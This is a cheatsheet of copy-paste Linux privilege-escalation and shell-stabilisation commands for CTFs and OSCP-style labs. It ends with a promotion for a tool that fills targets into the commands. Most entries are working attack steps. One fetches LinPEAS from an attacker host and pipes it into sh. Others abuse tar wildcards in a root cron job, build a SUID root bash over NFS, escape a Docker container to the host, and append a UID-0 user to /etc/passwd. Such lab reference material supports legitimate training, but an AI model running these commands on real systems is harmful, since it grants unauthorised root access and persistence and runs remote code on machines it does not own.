Linux PrivEsc & TTY cheatsheet
12 copy-paste commands for linux privesc & tty in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
TTY Interactive Shell Stabilization (Python + stty)
Upgrade dumb reverse shell to fully interactive pseudo-terminal with tab completion and arrow keys.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background shell
stty raw -echo; fg
export TERM=xterm-256color
stty rows 38 columns 140ttyptyshell-upgradestty
LinPEAS Direct Memory Execution
Download and execute LinPEAS directly in bash memory without writing to disk.
curl -L http://{LHOST}:8000/linpeas.sh | shlinpeasprivescautomatedcurl
SUID Binaries Exhaustive Discovery
List all binaries on the filesystem with the SUID bit set, ignoring proc and dev.
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;suidprivescfind
Linux Binary Capabilities (`getcap`) Audit
Check binaries granted dangerous capabilities like cap_setuid or cap_dac_read_search.
getcap -r / 2>/dev/nullcapabilitiesgetcapprivesc
Sudo Privileges Inspection (`sudo -l`)
Check current user sudo permissions without or with password.
sudo -lsudoprivescgtfobins
Internal Loopback Services & Listening Ports
Identify services running locally on 127.0.0.1 not exposed on external interfaces.
ss -tulpn | grep LISTENportsnetworkinternallocalhost
Crontabs & Scheduled System Jobs
Inspect system-wide crontab files, hourly/daily tasks, and pspy monitored jobs.
cat /etc/crontab /etc/cron.*/* 2>/dev/null; ls -la /var/spool/cron/crontabs/cronscheduled-tasksprivesc
Tar Wildcard Injection Cronjob Exploit
Abuse tar wildcard in automated root cronjob to execute arbitrary shell commands via checkpoint.
touch /var/backup/--checkpoint=1 && touch "/var/backup/--checkpoint-action=exec=sh root.sh"tarwildcardcronprivesc
NFS no_root_squash SUID Binary Exploit
Mount vulnerable NFS exported directory locally, compile SUID bash binary, and execute on target.
sudo mount -t nfs {TARGET_IP}:/share /mnt && cp /bin/bash /mnt/rootbash && chmod +s /mnt/rootbash && /mnt/rootbash -pnfsno-root-squashsuidprivesc
Docker Host Root Filesystem Mount Escape
Spawn privileged docker container mounting host root filesystem to /host.
docker run -v /:/host -it alpine chroot /host /bin/bashdockerescapecontainerprivesc
pspy Snooping Scheduled System Processes
Monitor running processes without root permissions to discover transient cronjobs and arguments.
./pspy64 -pf -i 1000pspycronmonitoringprivesc
Writable /etc/passwd New Root User Injection
Generate password hash and append a new user with UID 0 (root) to writable /etc/passwd.
echo "toor:$(openssl passwd -1 -salt evil Password123!):0:0:root:/root:/bin/bash" >> /etc/passwdpasswdrootmisconfigprivesc
Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet